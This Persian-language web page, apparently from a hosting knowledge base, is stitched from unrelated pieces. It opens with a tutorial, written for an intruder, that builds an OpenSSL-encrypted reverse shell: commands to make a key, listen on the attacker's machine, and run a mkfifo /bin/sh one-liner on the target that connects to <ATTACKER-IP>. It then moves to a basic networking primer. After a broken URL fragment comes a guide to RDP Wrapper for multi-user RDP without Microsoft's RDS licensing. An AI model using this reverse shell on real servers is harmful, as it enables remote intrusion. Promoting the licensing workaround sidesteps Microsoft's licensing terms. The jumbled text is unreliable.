شل معکوس با استفاده از OpenSSL

یکی از دسترسی هایی که نفوذگر بعد از دسترسی به سرور از طریق وب یا … نیاز دارد ، دسترسی به Shell است .

بدین طریق میتوان از ابزار openssl که بر روی سرور های لینوکسی به طور پیشفرض نصب است استفاده کنید

پس ابتدا کلید را میسازیم :

 

[email protected]# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

 

حال اقدام به Listen میکنیم ( روی ماشین نفوذگر )  :

openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>

 

در آخر از طریق سرور مقصد برای اتصال بصورت معکوس به ماشین اقدام میکنیم :

 

[email protected]#: mkfifo /tmp/s; /bin/sh
-i < /tmp/s 2>&1 | openssl s_client -quiet -connect
<ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s

 

شبکه های کامپیوتری چیست؟

اساسا یک شبکه کامپیوتری شامل دو یا بیش از دو کامپیوتر وابزارهای جانبی مثل چاپگرها، اسکنرها ومانند اینها هستند که بطور مستقیم بمنظور استفاده مشترک از سخت افزار ونرم افزار، منابع اطلاعاتی ابزارهای متصل ایجاده شده است توجه داشته باشید که به تمامی تجهیزات سخت افزاری ونرم افزاری موجود در شبکه منبع1(Source) گویند.
در این اشتراک گذاری با توجه به نوع پیکربندی کامپیوتر ، هر کامپیوتر کاربر می تواند در آن واحد منابع خود را اعم از ابزارها وداده ها با کامپیوترهای دیگر همزمان بهره ببرد.

” دلایل استفاده از شبکه را می توان موارد ذیل عنوان کرد :

1 – استفاده مشترک از منابع :

استفاده مشترک از یک منبع اطلاعاتی یا امکانات جانبی رایانه ، بدون توجه به محل جغرافیایی هریک از منابع را استفاده از منابع مشترک گویند.

2 – کاهش هزینه :

متمرکز نمودن منابع واستفاده مشترک از آنها وپرهیز از پخش آنها در واحدهای مختلف واستفاده اختصاصی هر کاربر در یک سازمان کاهش هزینه را در پی خواهد داشت .

3 – قابلیت اطمینان :

این ویژگی در شبکه ها بوجود سرویس دهنده های پشتیبان در شبکه اشاره می کند ، یعنی به این معنا که می توان از منابع گوناگون اطلاعاتی وسیستم ها در شبکه نسخه های دوم وپشتیبان تهیه کرد ودر صورت عدم دسترسی به یک از منابع اطلاعاتی در شبکه ” بعلت از کارافتادن سیستم ” از نسخه های پشتیبان استفاده کرد. پشتیبان از سرویس دهنده ها در شبکه کارآیی،، فعالیت وآمادگی دایمی سیستم را افزایش می دهد.

4 – کاهش زمان :

یکی دیگر از اهداف ایجاد شبکه های رایانه ای ، ایجاد ارتباط قوی بین کاربران از راه دور است ؛ یعنی بدون محدودیت جغرافیایی تبادل اطلاعات وجود داشته باشد. به این ترتیب زمان تبادل اطلاعات و استفاده از منابع خود بخود کاهش می یابد.

5 – قابلیت توسعه :

یک شبکه محلی می تواند بدون تغییر در ساختار سیستم توسعه یابد وتبدیل به یک شبکه بزرگتر شود. در اینجا هزینه توسعه سیستم هزینه امکانات وتجهیزات مورد نیاز برای گسترش شبکه مد نظر است.

6 – ارتباطات:

کاربران می توانند از طریق نوآوریهای موجود مانند پست الکترونیکی ویا دیگر سیستم های اطلاع رسانی پیغام هایشان را مبادله کنند ؛ حتی امکان انتقال فایل نیز وجود دارد.

در طراحی شبکه مواردی که قبل از راه اندازی شبکه باید مد نظر قرار دهید شامل موارد ذیل هستند:

1 – اندازه سازمان
2 – سطح امنیت
3 – نوع فعالیت
4 – سطح مدیریت
5 – مقدار ترافیک

6 – بودجه

مفهوم گره ” Node ” وایستگاههای کاری  :

هرگاه شما کامپیوتری را به شبکه اضافه می کنید ، این کامپیوتر به یک ایستگاه کاری یا گره تبدیل می شود.
یک ایستگاه کاری ؛ کامپیوتری است که به شبکه الصاق شده است و در واقع اصطلاح ایستگاه کاری روش دیگری است برای اینکه بگوییم یک کامپیوتر متصل به شبکه است. یک گره چگونگی وارتباط شبکه یا ایستگاه کاری ویا هر نوع ابزار دیگری است که به شبکه متصل است وبطور ساده تر هر چه را که به شبکه متصل والحاق شده است یک گره گویند”.
برای شبکه جایگاه وآدرس یک ایستگاه کاری مترادف با هویت گره اش است.
بعضی اوقات پیش می آید که ما نیاز داریم تا یوزر ها بصورت همزمان با RDP به سرور ویندوزی متصل شوند ، برای اینکار راه کار اصلی ماکروسافت برای بحث لایسنسینگ و … استفاده از رول/سرویس RDS است که خب نیاز به تهیه لایسنس دارد ! بنابراین راهکار اصلی و اصولی این است که رول […]&url=https%3A%2F%2Fwww.maralhost.com%2Fkb%2F%25d8%25a2%25d9%2585%25d9%2588%25d8%25b2%25d8%25b4-%25d8%25a7%25d8%25aa%25d8%25b5%25d8%25a7%25d9%2584-%25d9%2587%25d9%2585%25d8%25b2%25d9%2585%25d8%25a7%25d9%2586-%25da%2586%25d9%2586%25d8%25af%25db%258c%25d9%2586-%25db%258c%25d9%2588%25d8%25b2%25d8%25b1-%25d8%25a8%25d8%25a7-rdp%2F">

آموزش اتصال همزمان چندین یوزر با RDP

بعضی اوقات پیش می آید که ما نیاز داریم تا یوزر ها بصورت همزمان با RDP به سرور ویندوزی متصل شوند ، برای اینکار راه کار اصلی ماکروسافت برای بحث لایسنسینگ و … استفاده از رول/سرویس RDS است که خب نیاز به تهیه لایسنس دارد !

بنابراین راهکار اصلی و اصولی این است که رول RDS  نصب و کانفیگ بشه که خب هم زمان بر هستش ، هم لایسنس میخواد !

اما راهکار میانبر چیست :؟

استفاده از یک کتابخانه که به جای RDP  پیشفرض ویندوز مینشیند و کنترل کانکشن های RDP را در دست میگیرید

پس بدین منظور از لینک زیر آخرین ورژن را دانلود میکنیم ( .zip  ) ، extract میکنیم ، و فایل Install.bat رو با دسترسی      Administrator  اجرا میکنیم .

https://github.com/stascorp/rdpwrap/releases

 

GIT WRAPPER

WRAPPER RUN

 

نکته :

برای اینکه firefox  ها در یوزر های مختلف confilict  نداشته باشند باید بعد از لاگین در هر یوزر یک profile  ایجاد کنید و از ان استفاده کنید

دستور مقابل را در run  اجرا بفرمایید : firefox –profilemanager